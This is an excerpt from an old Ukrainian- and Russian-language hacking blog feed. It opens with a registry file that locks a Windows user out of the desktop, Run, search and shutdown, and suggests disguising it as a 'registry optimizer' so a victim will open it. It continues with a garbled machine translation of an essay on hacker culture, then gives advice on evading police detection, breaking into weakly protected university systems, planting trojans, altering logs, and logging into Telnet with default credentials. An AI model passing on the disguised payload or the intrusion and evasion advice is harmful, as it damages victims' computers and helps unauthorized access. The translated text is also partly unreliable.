"Regedit".&lt;br /&gt;Ніяке спеціально для такого хто боїться цю команду або щоб Ви не спалили можливий, потрібно створити типо файлік kill.reg Але в нього записати&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USERSoftwareMicrosoftWindows&lt;br /&gt;CurrentVersionPoliciesExplorer]&lt;br /&gt;"NoChangeStartMenu" = DWORD: 1&lt;br /&gt;"NoClose" = DWORD: 1&lt;br /&gt;"NoCommonGroups" = DWORD: 1&lt;br /&gt;"NoFavoritesMenu" = DWORD: 1&lt;br /&gt;"NoFind" = DWORD: 1&lt;br /&gt;"NoRecentDocsMenu" = DWORD: 1&lt;br /&gt;"NoRun" = DWORD: 1&lt;br /&gt;"NoSMHelp" = DWORD: 1&lt;br /&gt;"NoSMMyDocs" = DWORD: 1&lt;br /&gt;"NoSetFolders" = DWORD: 1&lt;br /&gt;"NoSetActiveDesktop" = DWORD: 1&lt;br /&gt;"NoSetTaskbar" = DWORD: 1&lt;br /&gt;"NoTrayContextMenu" = DWORD: 1&lt;br /&gt;"NoDesktop" = DWORD: 1&lt;br /&gt;&lt;br /&gt;Після створення файлу готового Ви просто клацає на його 2 рази.&lt;br /&gt;Як впарить Чи є: у пошті, щоб послати як пачілку на який або приводить на дискету і говорити, що цей тип регістратура оптимізатора, але якщо поруч з Вами гарна пам'ять, яка є простою, щоб запам'ятати пар цих рядків.&lt;br /&gt;Так тут - якщо за пару пляшок пива Вас попросять оживити винду, що все, Все що вам потрібно зделать це, змінити одинички в нулики і на початку змінених файлік! І залізку переребутіть але тільки не чарівною кнопкою в тілі а по человечески (Завершити сеанс користувача).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;Хакурство, книги хакерства, як стать хакером, взлом почти.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3747557182492945551?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3747557182492945551/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3747557182492945551' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3747557182492945551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3747557182492945551'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_3766.html' title='Глюкан Вікно'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-990699839790523839</id><published>2009-02-01T23:44:00.000-08:00</published><updated>2009-02-01T23:50:53.441-08:00</updated><title type='text'>А ти записався в хакери?</title><content type='html'>Хто такий хакер? Можна знайти купу визначень для терміну "хакер", більшість з яких пов'язане з технічною компетентністю та задоволенням, одержуваних від вирішення проблем та подолання перешкод. Але якщо ж ви хочете знати, як стати хакером, то дійсно істотними є два аспекти.&lt;br /&gt;Имеется некоторое сообщество, некая общая культура, яка складається із досвідчених програмістів та мережевих чарівників, яка в свою чергу веде свою історію від перших мінікомп'ютер з поділом часу і від самих ранніх експериментів з мережею ARPANET. Члени цієї культури і дали народження терміну "хакер". Хакери побудували Internet. Хакери зробили операційну систему Unix тим, чим вона є сьогодні. Хакери ведуть Usenet. Хакери забезпечують роботу World Wide Web. Якщо ви є частиною цієї культури, якщо ви внесли в неї свій внесок, і інші члени цієї культури знають - хто ви і називають вас хакером, то ви - хакер.&lt;br /&gt;Хакерська погляд на світ не обмежується лише культурою хакерів-програмістів. Є люди, які застосовують Хакерська підхід і до інших речей, на кшталт електроніки або музики. В дійсності, ви можете зустрітися з цим підходом на вищих рівнях будь-якої науки чи мистецтва. Софтверні хакери визнають таких близьких за духом людей і теж можуть називати їх "хакерами", деякі навіть проголошують, що Хакерська природа на самом деле не залежить від середовища, в якому працює хакер.&lt;br /&gt;Є й інша група людей, голосно називає себе хакерами, але вони ними не є. Це ті люди (головним чином, молодь чоловічої статі), кого тяга за злом комп'ютерних та телефонних систем. Справжні хакери називають таких людей "крекерамі" і не бажають мати з ними нічого спільного. Справжні хакери в більшості своїй вважають крекеров лінивий, безвідповідальними і не дуже розумними. Те, що людина здатна зламати систему безпеки, не робить його хакером, точно так само, як вміння угоняют тачки не робить вас автомобільним майстром. На жаль багато журналісти та письменники введені в оману і використовують слово "хакер" для опису крекеров, і це нескінченно дратує справжніх хакерів.&lt;br /&gt;Головне розходження в наступному: хакери будують речі, а крекери їх ламають.&lt;br /&gt;Якщо ви хочете стати хакером, то продовжуйте читання. Якщо ви хочете стати крекером, то прямуйте читати Ньюз-групу alt.2600і оголосіте відсидіти від п'яти до десяти років у в'язниці, коли виявите, що не настільки вправно наскільки вважали.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Хакерська підхід.&lt;br /&gt;&lt;br /&gt;Хакери вирішують проблеми і будують речі, вони вірять в свободу і в добровільну взаємодопомогу. Для того, щоб вас сприймали як хакера, ви повинні вести себе так, як якби це була ваша власна позиція. А для того, щоб вести себе так, ніби це ваша позиція, ви повинні дійсно вірити в цю позицію.&lt;br /&gt;Але якщо ви розраховуєте культивувати хакерських підходи лише для отримання визнання в культурі, то ви упустили суть.&lt;br /&gt;Стати такою людиною, хто вірить в подібні речі - це важливо для вас, тому що це допоможе вам навчитися і підтримає прагнення. Як і в будь-якому іншому творчості, найефективніший спосіб стати майстром - це наслідувати світогляду майстрів, не тільки інтелектуально, але й також емоційно.&lt;br /&gt;Так що якщо ви хочете стати хакером, то повторюйте наступні речі, поки не повірите в них:&lt;br /&gt; Світ сповнений чарівною проблем, що чекають свого рішення.&lt;br /&gt;Бути хакером - це величезне задоволення, але це задоволення такого роду, яке вимагає маси зусиль. Для таких зусиль потрібна мотивація. Атлети-чемпіони черпають мотивацію з свого роду фізичного задоволення, одержуваного від доведення власного тіла до досконалості, від подолання власних фізичних меж. Подібно до цього, щоб бути хакером ви повинні отримувати максимум задоволення від рішення проблем, від оттачіванія своїх навичок, від тренування свого інтелекту.&lt;br /&gt;Якщо ж ви не з тих, хто відчуває подібні речі природним чином, то вам знадобиться стати таким, щоб зробитися хакером. В іншому випадку ви виявите, що вся ваша Хакерська енергія вичерпана такими подразників, як секс, гроші і успіх в суспільстві.&lt;br /&gt;Ви також повинні розвинути щось віри у ваші власні здібності до навчання. Віри в те, що навіть якщо ви можливо і не знаєте всього, що необхідно для вирішення проблеми, але якщо ви освоїли лише шматочок і на цьому навчилися, то вже знаєте достатньо, щоб вирішити і наступний шматок - і так далі, поки все не буде зроблено.&lt;br /&gt; Ніхто і ніколи не повинен вирішувати проблему двічі.&lt;br /&gt;Творчі мізки - це цінний і обмежений ресурс. Не слід розтрачує їх на переізобретеніе колеса, коли навколо чекає так багато чудових нових проблем.&lt;br /&gt;Щоб поводитися як хакер, ви повинні вірити, що час роздумів інших хакерів - дорогоцінне, причому настільки, що майже моральним боргом для вас є поділитися інформацією. Вирішити проблеми, а потім просто роздати рішення, щоб інші хакери могли вирішувати нові проблеми замість того, щоб беспрестанно повертатися до старих.&lt;br /&gt;Від вас не потрібно вірити, що ви зобов'язані роздати всі плоди своєї творчості, хоча ті хакери, хто так робить, - найбільш шановані серед інших хакерів. З цінностями хакеров цілком узгоджується продаж плодів творчості, достатній для забезпечення вас їжею, покровом і комп'ютерами. Узгоджується це і з використанням ваших хакерських навиків для підтримки сім'ї і навіть для того, щоб розбагатіти, поки займаючись цим ви не забуваєте, що є хакером.&lt;br /&gt; нудьга і рутина - це зло.&lt;br /&gt;Хакери (і взагалі творчі люди) ніколи не повинні займати нудними речами або погрязать в рутині монотонної роботи, тому що коли це відбувається, то це означає, що вони не роблять того, що можуть робити лише вони - вирішувати нові проблеми. Подібне марнотратства шкодить кожному. Тому нудьга і рутина - це не просто неприємні речі, це зло.&lt;br /&gt;Щоб поводитися як хакер, ви повинні вірити в це так, щоб бажати автоматизації всіх нудних дрібниць настільки, наскільки це можливо, і не тільки для себе, але і для всіх (особливо для інших хакерів).&lt;br /&gt;Але іноді хакери займаються речами, які можуть здатися монотонних або нудними сторонньому спостерігачеві, в якості вправи для прочищення мізків або ті ж для вироблення навика.Лібо ж для придбання особливого роду досвіду, який неможливо отримати іншим шляхом. Але все це робиться за власним вибором, ніхто з вміють думати ніколи не повинен примушувати до нудною роботі.&lt;br /&gt; Свобода - це благо.&lt;br /&gt;Хакери за своєю природою антіавторітарни. Будь-хто, хто може віддати вам наказа, може зупинити рішення вами будь-який з проблем, вас зачарувати. І, враховуючи образ мислення авторитарних мізків, знайдуться які-небудь приголомшливо ідіотські причини, щоб це зробити. Так що з авторитарним підходом слід битися усюди, де ви його зустрінете, щоб він не душив вас і інших хакеров.&lt;br /&gt;Це не те ж саме, що боротися з усіма владою. Дітям потрібно керівництво, злочинність потрібно стримувати. Хакер може погоджуватися на ухвалення якогось роду керівництва, коли є можливість отримати те, що потрібно і не надто багато часу витрачатися на виконання наказів. Але це обмежена розумна операція, щось подібне до особистої поступки.&lt;br /&gt;Авторитаризм процвітає в умовах цензури і секретності. Його адепти не вірять в добровільну співпрацю і в ділення інформацією, їм подобатися тільки таке "співробітництво", яким керують вони. Тому, щоб поводитися як хакер, ви повинні виробити в собі інстинктивні неприйняття цензури, секретності, а також застосування сили або брехні для примушення відповідальних дорослих людей. І діяти необхідно виходячи з такої віри.&lt;br /&gt; Позиція не замінить компетентність.&lt;br /&gt;Для того, щоб бути хакером ви повинні розвинути деякі з перерахованих підходів. Але вхопити лише підходи ви спроневіритеся хакером не в більшою мірою, чим спортсменом-рекордсменом або рок-зіркою. Для того, щоб стати хакером, потрібен інтелект, практика, самовідданість і тяжка праця.&lt;br /&gt;Тому вам доведеться навчитися з недовірою ставитися до позиції, але з повагою до компетентності будь-якого роду. Хакери не дозволяють позерам розтринькувачів їх час, але вони поклоняються компетентності, особливо хакерской компетентності, але компетентність хороша в чому завгодно. Особливо цінується володіння такими необхідними навиками, які мало у кого є. А найкраще - це компетентність в таких навичках, які вимагають проникливо розуму, вправності і концентрації.&lt;br /&gt;Якщо ви боготворить компетентність, то ви отримуєте насолоду, розвиваючи її в собі. Тяжка праця і відданість стануть для вас захоплюючою грою, а не рутиною. І це життєво необхідно для того, щоб стати хакером.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Основні навички.&lt;br /&gt;&lt;br /&gt;Хакерська погляд на життя - це важливо, але майстерність - багато разів важливіше. Позиція не замінить компетентності, і існує певний набір базових навичок, якими вам необхідно володіти, перш ніж будь-який з хакерів те подумав назвати хакером і вас.&lt;br /&gt;Цей базовий набір з часом потихеньку змінюється у міру того, як технологія породжує нові навики і робить непотрібними застарілі. Наприклад, зазвичай згадувалося програмування на машинному мовою, але аж до недавнього часу в набір не включали мову HTML. Однак, в сьогоднішній комплект цілком безумовно входять наступні компоненти:&lt;br /&gt; Навчитеся програмувати.&lt;br /&gt;Це, звичайно ж, фундаментальний Хакерська навичку. Якщо ж ви не знаєте жодного комп'ютерного мови, рекомендуємо почати з мови Python. Він зрозуміло розроблений, добре документовано і відносно доброзичливців до новачків. Незважаючи на те, що він гарний для першого мови, це не просто іграшка. Це потужний і гнучкий мову, добре підходить для великих об'єктів.&lt;br /&gt;Але знайте, що ви не зможете хакерському рівня майстерності (або рівня хорошого програміста), якщо будете знати тільки одну мову програмування. Вам необхідно навчитися мислити про проблеми програмування взагалі, незалежно від будь-якого конкретного мови. Щоб бути справжнім хакером, вам треба досягти рівня, на якому ви зможете вивчити нову мову за декілька днів, співвідносячи положення керівництва з тим, що вам вже відомо. Це означає, що вам слід вивчити декілька дуже різних мов.&lt;br /&gt;Якщо ви займаєтеся серйозним програмуванням, то вам доведеться вивчити Сі, основну мову операційної системи Unix (хоча це і не та мова, який слід намагатися вивчити першим). Інші мови першорядної важливості для хакерів - це Perl та Lisp. Мова Perl має сенс вивчити з практичних міркувань: він дуже широко використовується для активних Web-сторінок і системного адміністрування, так що навіть якщо вам і ніколи не доведеться писати на Perl, ви повинні навчитися його читати. Lisp варто вивчити ради тих глибоких освічених знань, які ви знайдете, коли нарешті його освоїте. Ці пізнання зроблять вас прекрасним програмістом на все життя, навіть якщо ви ніколи особливо і не будете використовувати сам Lisp.&lt;br /&gt;Найкраще, на самом деле, вивчити всі чотири цих мови (Python, C, Perl та Lisp). Крім того, що це найважливіші хакерських мови, вони демонструють дуже різні підходи до програмування і кожен з них навчить вас цінним речам.&lt;br /&gt;Ми не можемо дати тут розгорнуті інструкції щодо того, як навчитися програмувати - це складне мистецтво. Але можемо сказати вам, що книги і курси цьому не навчать (багато, можливо, більшість хакерів - це самоучка). Що цьому учить, так це читання кодів і написання кодів.&lt;br /&gt;Навчитися програмувати - це як навчитися писати гарним природним мовою. найкращий спосіб для цього - почитати щось з написаного майстрами, потім написати трохи самому; прочитати більше, написати трохи більше; прочитати ще більше, написати ще більше ... І повторювати цей процес до тих пір, поки ваші програми не разовьются в щось потужне і економічне.&lt;br /&gt;Відшукати хороші коди для читання раніше було складно, тому що було дуже мало великих програм, доступних у вихідних кодах і придатних для вивчення і виникає юних хакерів. Нині ситуація кардинально змінилася: програми в початкових кодах, программістскій інструментарій та операційні системи тепер широко доступні. Тому ...&lt;br /&gt; Дістаньте один з варіантів Unix в початкових кодах, навчіться його використовувати і з ним працювати.&lt;br /&gt;Вважаємо, що ви маєте персональний комп'ютер або можете отримати до нього доступ. Єдиний і найважливіший крок, який будь-який з новачків може зробити для придбання хакерських навиків, - це роздобути копію Linux або одній з версій BSD-Unix, встановити її на персональній машині і запустити.&lt;br /&gt;Так, в світі є і інші операційні системи окрім Unix. Але їх поширюють в двійковому вигляді - ви не зможете читати коди і не зможете їх модифікувати. Вчитися хакерством на машинах під DOS, Windows або MacOS - це все одно, що вчитися танцювати повністю загіпсованним.&lt;br /&gt;Крім того, Unix - це операційна система Internet. Хоча ви можете навчитися використовувати Internet і не знаючи Unix, але ви не можете бути Internet-хакером, не розуміючи Unix. З цієї самої причини сьогоднішня Хакерська культура є досить сильно Unix-сконцентруватися. (Це не завжди було так, і деяким з колишніх хакерів таке положення справ не дуже до вподоби, але симбіоз між Unix та Internet став настільки міцний, що навіть сили Microsoft не вистачає, щоб серйозно на це вплинути).&lt;br /&gt;Так що заводить собі Unix, найкраще Linux, але є й інші варіанти (ви можете працювати як під Linux, так і під DOS / Windows на одній і тій же машині). Вивчите цю ОС. Працюйте з нею. Возітесь з нею. Спілкуйтеся через неї з Internet. Читайте коди. Модифікує їх. Ви отримаєте такий программістскій інструментарій (включаючи C, Lisp і Perl), про який кожна з ОС Microsoft і не мріяла. Ви отримаєте задоволення, і ви засвоїте більше знань, ніж припускали в процесі навчання, коли оглянитесь на цей процес вже будучи майстром-хакером.&lt;br /&gt; Навчитеся використовувати World Wide Web і писати на HTML.&lt;br /&gt;Більшість з тих речей, що створені хакерской культурою роблять свою справу невидимо, допомагаючи працювати фабрикам, установам і університетам без скільки-небудь помітного впливу на життя не-хакерів. WWW - це одне велике виключення, гігантська блискуча Хакерська іграшка, яка навіть по визнанню політиків змінює світ. Лише з однієї цієї причини (а також і безлічі інших приємних причин) вам слід навчитися працювати з Web.&lt;br /&gt;Це не означає, що потрібно просто навчитися керувати браузером (це будь-який вміє), але й навчитися писати на HTML, мові розмітки документів Web. Якщо ви ще не вмієте програмувати, то писання на HTML навчить ваше мислення деяким корисним звичкам, які стануть у нагоді при освоєнні мов програмування. Так що робіть домашню сторінку. Але просте володіння домашньої сторінки навіть і близько не поведе вас до того, щоб стати хакером. У Web повним-повнісінько домашніх сторінок. Більшість з них - це безглуздий, непрацюючий мотлох. Вкрай кидка і привабливо оформлений непотріб, безперечно, але все одно непотріб.&lt;br /&gt;Щоб бути стоящей, ваша сторінка повинна мати "контент" - зміст. Вона повинна бути цікавою та / або корисною для інших хакерів.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Хакерська культура.&lt;br /&gt;&lt;br /&gt;Як і більшість культур без грошової економіки, Хакерландія будується на репутації. Ви намагаєтеся вирішити цікаві проблеми, але наскільки вони цікаві, і наскільки хороші ваші рішення, - це щось таке, про що зазвичай можуть судити тільки (у технічному сенсі) рівні вам або що перевершують вас.&lt;br /&gt;Таким чином, коли ви граєте у хакерському гри, ви вчитеся вести рахунок головним чином по тому, що думають про вашу майстерність інші (саме тому ви не будете хакером до тих пір, поки вас не стануть так називати інші хакери). Даний факт затеняют як образ хакера-одинака, так і певні табу Хакерська культури, не допускають, щоб чиєсь его чи зовнішні визнання взагалі могли бути мотивацією для хакера.&lt;br /&gt;Зокрема Хакерландія - це те, що антропологи називають "культурою дарів". Ви заробляєте статус і репутацію не тим, що керувати іншими людьми, і не тим що прекрасні, і не тим, що є речі, які є предметом жадання інших. Але швидше тим, що роздає речі. Зокрема, одарівая своїм часом, своєю майстерністю і результатами своєї творчості.&lt;br /&gt;Є п'ять основних типів речей, які ви можете робити, щоб вас поважали хакери:&lt;br /&gt; Пишіть програм з відкритим вихідним кодом.&lt;br /&gt;Перше - це писати програми, які інші хакери вважають забавними або корисними, і роздавати початкові коди програм для використання всієї хакерской культурою.&lt;br /&gt;Таку роботу називали "вільно-доступним програмним забезпеченням" (free software), але це приводить у замішання деяких людей, точно не розуміють, що мається на увазі за словом "вільно-доступне". Тепер для такого програмного забезпечення багато хто воліє використовувати термін "з відкритим вихідним кодом" або "Open-source software". Найбільш шанованих напівбоги Хакерландіі - це люди, які написали великі і талановиті програми, що відповідають найширшим потребам, і які роздали їх всім, так що кожен тепер їх використовує.&lt;br /&gt;Допомагайте тестувати і отлажівать програми з відкритим вихідним кодом.&lt;br /&gt;Почитаемы также те, кто тестирует и отлаживает программы с открытым исходным кодом. В этом несовершенном мире мы неизбежно затрачиваем самую большую часть времени разработки программы на фазу отладки. Именно поэтому любой думающий автор программ с открытым кодом скажет вам, что хорошие бета-тестеры (знающие, как внятно описать симптомы, хорошо локализующие проблемы, способные исправлять опечатки и применяющие несколько простых диагностических подпрограмм) ценятся на вес золота. Всего один такой человек может превратить фазу отладки из затянутого изнуряющего кошмара в просто полезную задержку.&lt;br /&gt;Если вы новичок, то попытайтесь найти разрабатываемую программу, которая вам интересна, и станьте хорошим бета-тестером. Существует вполне естественный путь продвижения от помощи в тестировании программ к помощи в их отладке и далее к помощи их модификации. Вы многому научитесь таким способом и породите добрую карму в отношениях с людьми, которые помогут вам впоследствии.&lt;br /&gt;Публикуйте полезную информацию.&lt;br /&gt;Еще одна хорошая вещь - отбирать и накапливать полезную и интересную информацию на Web-страницах или документов типа ЧаВО (FAQ или "часто задаваемые вопросы и ответы"), и делать их общедоступными.&lt;br /&gt;Ведущие основных технических ЧаВО почти столь же уважаемы, как и авторы программ с открытым исходом кодом.&lt;br /&gt;Помогайте поддерживать работу инфраструктуры.&lt;br /&gt;Хакерская культура (и инженерная разработка Internet) основана на добровольцах. Имеется масса необходимой, но не особо эффективной работы, которую нужно делать, чтобы поддерживать процесс: администрирование рассылочных листов, модерирования новостных групп, управление большими архивами программного обеспечения, разработка RFC и других технических стандартов.&lt;br /&gt;Люди, хорошо делающие такого рода вещи, глубоко уважаемы, поскольку каждый знает, что подобная работа требует кучу времени и не так забавна как игры с кодами. Это работа свидетельствует о самоотверженности.&lt;br /&gt;Служите самой хакерской культуре.&lt;br /&gt;Наконец, вы можете служить и распространять саму культуру. Но этим не стоит заниматься до тех пор, пока вы не поваритесь в этом достаточное время и не станете хорошо известны благодаря одной из четырех первых вещей.&lt;br /&gt;В хакерской культуре нет явных лидеров, но здесь есть "культурные герои", "племенные старейшины", историки и ораторы. Когда вы достаточно долго поживете в этих траншеях, то сможете вырасти в одного их таких людей. Но остерегайтесь: хакеры настороженно относятся к своим крикливым племенным старейшинам, так что видимое достижение такого рода славы таит в себе опасность. Вместо того, чтобы стремиться к этому, вам лучше как бы не заботиться об этом и тогда это само упадет на колени, а уж затем можно стать скромным и милостивым в своем статусе.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Хакер - "придурок"?&lt;br /&gt;&lt;br /&gt;Вопреки расхожему мифу, вам не обязательно быть придурком, чтобы быть хакером. Это, однако, помогает, и многие хакеры действительно "придурки". Статус изгоя общества помогает вам оставаться сосредоточенными на действительно важных вещах, таких как размышление и хакерство.&lt;br /&gt;Именно по этой причине многие хакеры носят ярлык "придурок" и даже используют в качестве знака доблести более грубый термин "кретин" - это их способ декларации своей независимости от общепринятых в обществе оценок.&lt;br /&gt;Если вы способны в достаточной степени сосредоточиться на хакерстве, достигать здесь заметных результатов и при этом иметь личную жизнь - что ж, прекрасно. Сегодня это намного легче. Культурный мейнстрим стал теперь намного дружелюбнее к техно-придурком . Есть даже растущее количество людей, обнаруживающих, что хакеры зачастую могут быть вполне качественными любовниками и супругами.&lt;br /&gt;Если же вас влечет к хакерству по той причине, что у вас нет личной жизни, что ж, и это неплохо. По крайней мере, у вас не будет проблем с концентрацией. А личная жизнь - как знать, может она придет позже.&lt;br /&gt;&lt;br /&gt;Искусство взлома.&lt;br /&gt;&lt;br /&gt;Хакинг - это искусство взлома всевозможных систем и доведение данного процесса до высот технического изящества. Хакер вооружается различными методиками, исходя из которых он строит собственную стратегию взлома той или иной программы. Зачем же быть хакером? Вы наверняка найдете для себя несколько причин. Для некоторых, например, это в первую очередь просто прекрасное развлечение. Но сейчас заниматься хакингом становиться все более опасно, поэтому будьте осторожны, даже если у вас нет противозаконных намерений. Это очень трудоемкое и к тому же рискованное дело. Так что будьте внимательны и не попадитесь.&lt;br /&gt;Как не пойматься?&lt;br /&gt;Жизнь прекрасна, только когда вы не попадетесь в руки спецслужб. Конечно, это зависит от того, чем вы занимаетесь. Но может получиться так, что вы все равно попадетесь, несмотря на беспрекословное выполнение следующих рекомендаций.&lt;br /&gt;Некоторые операторы спецслужб очень настойчивы, и не остановятся, пока не вычислят и не прижмут вас к стенке. И если, как только вы берете трубку телефона, мгновенно подключаются модемы или если до вас доходят слухи, что друзья-приятели называют вас "хакером, на след которого напали спецслужбы", то лучше вам затаится на какое-то время и не заниматься взломом.&lt;br /&gt;Существует несколько основополагающих моментов, которые обязан знать каждый, использующий модем при компьютерном взломе. Вы постоянно должны быть начеку и следить за появлением таких настораживающих явлений, как:&lt;br /&gt;1. Необычные шумы на линии, при том, что обычно их не бывает.&lt;br /&gt;2. По телефонной линии прослушиваются другие голоса.&lt;br /&gt;Это иногда случается со старым оборудованием FDM, но может быть вызвано и ответвлением провода.&lt;br /&gt;3. Появление фургона, припаркованного рядом с:&lt;br /&gt;а) телефонным столбом;&lt;br /&gt;б) подземным паровым вентиляционным отверстием.&lt;br /&gt;Если вы заметили что-нибудь из вышеуказанного, прекращайте все упражнения по крайней мере на месяц. И обязательно убедитесь, что фургон уехал, а не просто поменял место парковки.&lt;br /&gt;Обратите внимание на провода, протянутые от фургона к телефонному столбу или вентиляционному отверстию. Также следует выяснить не принадлежит фургон телефонной компании.&lt;br /&gt;4. Наличие незнакомого вам оборудования в нежилых комнатах вашего дома обязательно должно вас насторожить.&lt;br /&gt;5. С вашей телефонной линией происходит что-то странное, и вы уверены в том, что соседи не имеют к этому никакого отношения.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Ответвление провода.&lt;br /&gt;&lt;br /&gt;На сегодняшний день этот способ вычисления хакеров остается самым распространенным. Выявить отклонение провода можно так. Если вы в состоянии позволить себе приобрести соответствующее оборудование, то сможете заниматься тем, что называется "чистка" телефонной линии. Еще во время телефонного разговора напряжение резко падает, то означает, что от вашего телефона ответвлен провод или кто-то подключился к линии. Возможные показания прибора:&lt;br /&gt;Напряжение, которое должно вас насторожить - 90V при 20-30Hz&lt;br /&gt;На линии - 30-50V&lt;br /&gt;Среднее напряжение- 600V. В модеме может сгореть MOV. Обычно при таком напряжении телефонная сеть неисправна.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Определение номера.&lt;br /&gt;&lt;br /&gt;Спецслужбы используют еще один способ определения местонахождения хакера. На сегодняшний день вычисление телефонного номера стало доступным практически каждому. Недавно было обнаружено, что если набрать 33 на некоторых телефонах, то на аппарате высветится номер последнего звонка.&lt;br /&gt;И полиция пользуется именно такими телефонами для вывода вас на чистую воду. Но все это, в основном, касается радиотелефонов, а не обыкновенных городских линий. Радиотелефонная связь всегда была известна своей надежностью, но, конечно же, не сейчас: Потому что такая телефонная станция - одно из самых лучших мест для занятия хакингом. Но лучше не предпринимайте ничего подобного в своем доме. Самое подходящее для хакинга время - ночь, когда дежурный оператор спецслужб наверняка спит.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;&lt;br /&gt;Считывание RFI.&lt;br /&gt;&lt;br /&gt;Это один из новейших способов вычисления хакеров, но его-то не стоит бояться. Для выполнения он слишком сложен, и к тому же не всегда срабатывает. Особенно если вы находитесь в окружении телевизоров и мониторов. Считывание RFI осуществляется с помощью устройства, которое ловит слабые радиочастоты вашего монитора и переводит их в видеосигналы. И если это срабатывает, то оператор видит на своем компьютере изображения с вашего монитора. Все это, конечно, впечатляет, но этот оператор еще должен сначала поймать ваш сигнал.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Система ESS.&lt;br /&gt;&lt;br /&gt;Ко всем радостям прибавляется еще одна - Standardized Switching (или ESS). Когда ее вводили, то говорили, что она нужна для разгрузки телефонной линии. Но единственная цель этой системы - ловить хакеров. Это единственное к чему она предназначена, и надо сказать, что делает это она очень неплохо. С ее помощью телефонная компания может вычислить любой номер за 55 секунд. В системе регистрируются записи всех телефонных звонков, в том числе и местных. И даже если ваш телефон не исправен, то ваша попытка с него куда-то позвонить станет тут же известна полиции. Но эта система еще не конец света.&lt;br /&gt;&lt;br /&gt;Хакерская этика.&lt;br /&gt;&lt;br /&gt;Пока существует компьютер, существуют и хакеры. В 50-х годах в массачусетском институте технологии (MIT) студенты посвятили много времени и энергии изобретению компьютеров. Правила и закон игнорировались. Так как их привели в восторг итоги исследований, так наши исследования приводят в восторг и нас. Торжество хакера заключается не в нарушении закона, а в волнующем процессе исследования и накопления знаний. Некоторые рекомендации, чтобы не попасть в неприятное положение, но чтобы не повредить те компьютеры, которые станут объектом вашего профессионального внимания:&lt;br /&gt; Не вредить преднамеренно ни одной системе.&lt;br /&gt; Не изменять никаких системных файлов, кроме необходимых вам для дальнейшего доступа (троянские кони, изменения в старых логах и т.п.)&lt;br /&gt; Не оставлять никаких настоящих данных в системах, взломанных вами (перед использованием нового программного продукта по взлому необходимо проверить, не оставляет ли он ваш ID там, где вы побывали)&lt;br /&gt; Не оставлять ваш реальный номер телефона никому, кого вы не знаете.&lt;br /&gt; Не трогать правительственные компьютеры.&lt;br /&gt; Наконец, вы должны понять, что можете прочесть все пособия в мире и прослыть знатоком, но пока вы не начнете реально работать, все ваши знания равны нулю.&lt;br /&gt;Одно из самых безопасных мест для начала хакерской карьеры - компьютерная система института. Университетские компьютеры имеют слабую защиту, и часто используются хакерами, поскольку каждый компьютер используется множеством людей, мало вероятно, чтобы вас реально вычислили среди юзеров, если вы были обнаружены.&lt;br /&gt;&lt;br /&gt;наверх&lt;br /&gt;Сеть Telnet..&lt;br /&gt;&lt;br /&gt;Лучшее место для тренировок начинающего хакера - одна из больших сетей типа Telnet. Почему? Во-первых, на сетях имеется огромное разнообразие компьютеров, есть из чего выбирать. Во-вторых, сети довольно хорошо продокументированы. Проще найти кого-то, кто может вам помочь с проблемой Telnet, чем искать помощи относительно вашего местного компьютера колледжа или средней школы. Третье, сети более безопасны. Из-за огромного числа запросов, которые приходят каждый день по большим сетям, фактически тяжело отследить, откуда и какой запрос сделан. Также очень просто маскировать ваше проникновение, используя сеть, которая делает ваше хобби намного безопасным.&lt;br /&gt;Telnet имеет большое количество компьютеров, соединенных в сеть, чем любая другая система в мире, от Telnet вы можете иметь доступ к Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET и целому набору других сетей.&lt;br /&gt;Первый шаг, который вы должны сделать, идентифицировать ваш местный порт дозвона. Сначала вы получите подсказку, говорящую:&lt;br /&gt;ТЕРМИНАЛ=&lt;br /&gt;Это - ваш type терминала. Если вы имеете vt100 эмуляцию, напечатайте это в ответ на запрос. Или нажмите возврат, и она станет стандартной установкой для режима терминала ввода-вывода.&lt;br /&gt;Теперь вы получите подсказку в виде значка @. В ответ напечатайте:&lt;br /&gt;@c mail&lt;br /&gt;и затем будет запрос об имени пользователя. Введите "phones" для имени пользователя. Когда система запросит пароль, введите снова "phones". Начиная с этого момента, это - управляемое меню. Используйте его, чтобы определить ваш общий dialup. Когда вы вызываете ваш local dialup, вы еще раз пройдете запрос:&lt;br /&gt;ТЕРМИНАЛ=&lt;br /&gt;и еще раз вы будете представлены перед @. Эта подсказка сообщает, что вы соединены с Telnet PAD. PAD обозначает или Ассемблер/дизассемблер пакета (если вы говорите с инженером), или Public Access Device (если вы говорите с представителями маркетинга Телнета). Первое описание более правильно.&lt;br /&gt;Telnet работает, собирая данные, которые вы вводите на PAD с которым вы соединены, связывая информацию в куски по 128 байтам (обычно, но цифра может быть изменена), и затем передавая их на скорости в пределах от 9600 до 19200 бода на другой, который получает данные и передает их компьютеру или системе, с которой имеется соединение. Изначально, PAD позволяет соединить два компьютера, которые имеют различные скорости или протоколы связи, на длинном расстоянии. Иногда можно заметить запаздывание в отдаленном ответе машин. 